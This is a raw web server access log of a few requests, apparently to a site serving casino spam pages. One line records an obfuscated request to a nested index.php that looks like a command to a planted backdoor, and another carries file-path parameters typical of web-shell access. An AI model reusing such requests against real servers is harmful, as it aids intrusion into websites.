216.73.217.81 - - [01/May/2026:11:37:17 +0300] "GET /zodiac-casino-bonus-zonder-storting-2026/%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper%2Fpackage.json&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fthemes%2Fthe-landscaper HTTP/2" 200 3077 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.163 - - [01/May/2026:11:37:24 +0300] "GET /shop/infectiously/leucocephala281121497443.html HTTP/1.1" 200 30064 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [01/May/2026:11:35:34 +0300] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313737373632383133342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373632343533342q3362333865393031303430386362326664353962313234336336616164666264222p2232223n223961653666303430626138373466383563353361623033333739666431373232222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q35302q35342q36322q37352q38352q3134227q HTTP/1.0" 500 567 "-" "-"
66.249.78.2 - - [01/May/2026:11:37:38 +0300] "GET /?detail/569652083 HTTP/1.1" 200 30244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/147.0.7727.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.10 - - [01/May/2026:11:37:40 +0300] "GET /cerrado-casino-codigo-promocional-y-bonus-code-2026/ HTTP/1.1" 200 10398 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
